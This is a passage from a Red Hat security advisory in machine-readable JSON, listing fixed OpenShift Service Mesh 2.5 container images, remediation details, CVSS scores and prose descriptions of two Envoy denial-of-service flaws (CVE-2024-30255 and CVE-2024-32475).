"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-30255"
},
{
"category": "external",
"summary": "RHBZ#2272986",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272986"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-30255",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30255"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-30255",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30255"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm"
},
{
"category": "external",
"summary": "https://nowotarski.info/http2-continuation-flood/",
"url": "https://nowotarski.info/http2-continuation-flood/"
},
{
"category": "external",
"summary": "https://www.kb.cert.org/vuls/id/421644",
"url": "https://www.kb.cert.org/vuls/id/421644"
}
],
"release_date": "2024-04-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood"
},
{
"cve": "CVE-2024-32475",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2024-04-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2276149"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
